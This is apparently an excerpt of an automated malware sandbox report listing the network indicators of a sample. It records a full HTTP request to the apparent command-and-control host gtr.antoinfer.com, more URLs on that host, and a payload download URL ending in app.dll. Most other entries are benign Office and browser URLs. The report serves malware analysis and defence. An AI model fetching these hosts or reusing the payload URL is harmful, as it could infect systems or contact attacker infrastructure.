                  Source: global trafficHTTP traffic detected: GET /h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIHQG/CB4JNANcQf7aA7/T_2FdtzxTEW5qEGgXi5de/wQDU_2FVQ9AqPhgZ/QBiqWLaZem_2BhU/Ub_2Bbrgr7V1ABDC_2/FRiGY94s4/Mw6BG5UCBUeOPfAvsqhw/LTDXh6l0kPjcKC2fY3f/eXzxQUf3im0jBAcOxzjmlM/t_2BlYZFFpOnU/rPHW4IFe/pXsS9omB7zF_2B_2BEp_2BV/Ya9nAT6p4X/2ixawH6C4M4LLI7hR/_2BGNe0TQDy_/2FBKn745niy/_2BRADxlO6wxP1/zz_2BWqAzRaI/gWg HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: msapplication.xml0.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                  Source: msapplication.xml0.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                  Source: msapplication.xml5.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                  Source: msapplication.xml5.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                  Source: msapplication.xml7.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                  Source: msapplication.xml7.23.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                  Source: unknown | DNS traffic detected: queries for: free.mynowministries.com
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Thu, 08 Jul 2021 13:46:50 GMT; Content-Type: text/html; charset=utf-8; Transfer-Encoding: chunked; Connection: close; Content-Encoding: gzip; Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a; Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                  Source: powershell.exe, 00000027.00000002.587349219.000002B5AD3CF000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: {5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF99BD870E81A4914B.TMP.23.dr | String found in binary or memory: http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp | String found in binary or memory: http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/
                  Source: {7879BAAA-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF4AB9BBFB5CFFE773.TMP.28.dr | String found in binary or memory: http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/7AJjg
                  Source: {7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr | String found in binary or memory: http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp | String found in binary or memory: http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gare
                  Source: {7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr | String found in binary or memory: http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH
                  Source: {7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DFA7B5BF1FB774EA36.TMP.28.dr | String found in binary or memory: http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk
                  Source: {7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF436C4ACF406520B7.TMP.28.dr | String found in binary or memory: http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                  Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                  Source: powershell.exe, 00000025.00000002.587720869.0000028658461000.00000004.00000001.sdmp, powershell.exe, 00000027.00000002.589665519.000002B5AD541000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                  Source: csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
                  Source: msapplication.xml.23.dr | String found in binary or memory: http://www.amazon.com/
                  Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: msapplication.xml1.23.dr | String found in binary or memory: http://www.google.com/
                  Source: msapplication.xml2.23.dr | String found in binary or memory: http://www.live.com/
                  Source: msapplication.xml3.23.dr | String found in binary or memory: http://www.nytimes.com/
                  Source: msapplication.xml4.23.dr | String found in binary or memory: http://www.reddit.com/
                  Source: msapplication.xml5.23.dr | String found in binary or memory: http://www.twitter.com/
                  Source: msapplication.xml6.23.dr | String found in binary or memory: http://www.wikipedia.com/
                  Source: msapplication.xml7.23.dr | String found in binary or memory: http://www.youtube.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.aadrm.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.cortana.ai
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.diagnostics.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.microsoftstream.com/api/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.office.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.onedrive.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://apis.live.net/v5.0/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://augloop.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://augloop.office.com/v2
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://autodiscover-s.outlook.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://cdn.entity.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://clients.config.office.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://config.edge.skype.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://cortana.ai
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://cortana.ai/api
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://cr.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://dataservice.o365filtering.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://dataservice.o365filtering.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://dev.cortana.ai
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://devnull.onenote.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://directory.services.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://enrichment.osi.office.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                  Source: close.xml | String found in binary or memory: https://free.mynowministries.com/app.dll
                  Source: powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://graph.ppe.windows.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://graph.ppe.windows.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://graph.windows.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://graph.windows.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://incidents.diagnostics.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://lifecycle.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://login.microsoftonline.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://login.windows.local
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://management.azure.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://management.azure.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://messaging.office.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://ncus.contentsync.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://ncus.pagecontentsync.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://officeapps.live.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://onedrive.live.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://onedrive.live.com/embed?
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://osi.office.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://outlook.office.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://outlook.office365.com/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://pages.store.office.com/review/query
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
